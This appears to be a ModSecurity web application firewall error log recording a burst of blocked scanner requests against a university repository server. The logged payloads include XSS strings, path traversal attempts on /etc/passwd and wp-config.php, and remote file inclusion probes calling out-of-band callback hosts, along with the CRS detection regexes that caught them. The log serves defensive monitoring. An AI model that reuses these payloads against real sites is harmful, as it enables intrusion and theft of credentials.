[Tue Aug 29 11:54:37.986919 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAAqY550AAAAr"]
[Tue Aug 29 11:54:39.536147 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqRzDQAAAAM"]
[Tue Aug 29 11:54:40.186693 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "repositoryfh.unla.ac.id"] [uri "/index.php/config.inc.php-good"] [unique_id "ZO16D8Co-f0AAAqSwjYAAAAN"]
[Tue Aug 29 11:54:40.321175 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAAqRzDQAAAAM"]
[Tue Aug 29 11:54:40.539405 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAApl@BoAAAAo"]
[Tue Aug 29 11:54:41.579708 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAApa-FkAAAAg"]
[Tue Aug 29 11:54:41.604724 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfh.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApZHXoAAAAf"]
[Tue Aug 29 11:54:44.628005 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfh.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAApKazkAAAAZ"]
[Tue Aug 29 11:54:46.649049 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAApKa0IAAAAZ"]
[Tue Aug 29 11:54:47.612948 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAApa-G8AAAAg"]
[Tue Aug 29 11:54:50.580885 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqY57wAAAAr"]
[Tue Aug 29 11:54:50.606838 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqhN@sAAAAE"]
[Tue Aug 29 11:54:50.699736 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAAqRzE4AAAAM"]
[Tue Aug 29 11:54:52.566330 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqSwlgAAAAN"]
[Tue Aug 29 11:54:52.599588 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqWwaQAAAAl"]
[Tue Aug 29 11:54:54.611007 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAApHRaIAAAAP"]
[Tue Aug 29 11:54:55.725106 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAApa-JAAAAAg"]
[Tue Aug 29 11:54:56.568215 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAoz7@wAAAAS"]
[Tue Aug 29 11:54:56.589595 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0c35h9b8cbfm3f.oast.site found within TX:1: cjmnijtjmimvgniikdb0c35h9b8cbfm3f.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAApk-aAAAAAn"]
[Tue Aug 29 11:54:57.539429 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApHRa0AAAAP"]
[Tue Aug 29 11:54:57.539509 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApHRa0AAAAP"]
[Tue Aug 29 11:54:57.882219 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IcCo-f0AAApk-aUAAAAn"]
[Tue Aug 29 11:54:59.851802 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAqY5@MAAAAr"]
[Tue Aug 29 11:55:00.555757 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO16JMCo-f0AAAqSwnMAAAAN"]
[Tue Aug 29 11:55:02.888321 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAoAk@YAAAAC"]
[Tue Aug 29 11:55:03.947367 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAqqtZsAAAAA"]
[Tue Aug 29 11:55:04.638518 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqsV1gAAAAB"]
[Tue Aug 29 11:55:05.679247 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqqtaMAAAAA"]
[Tue Aug 29 11:55:06.083472 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KsCo-f0AAApXglcAAAAU"]
[Tue Aug 29 11:55:06.552764 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApHRdAAAAAP"]
[Tue Aug 29 11:55:06.688333 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KsCo-f0AAApbUcIAAAAh"]
[Tue Aug 29 11:55:08.602615 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqY5-cAAAAr"]
[Tue Aug 29 11:55:11.568491 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfh.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAApa-MsAAAAg"]
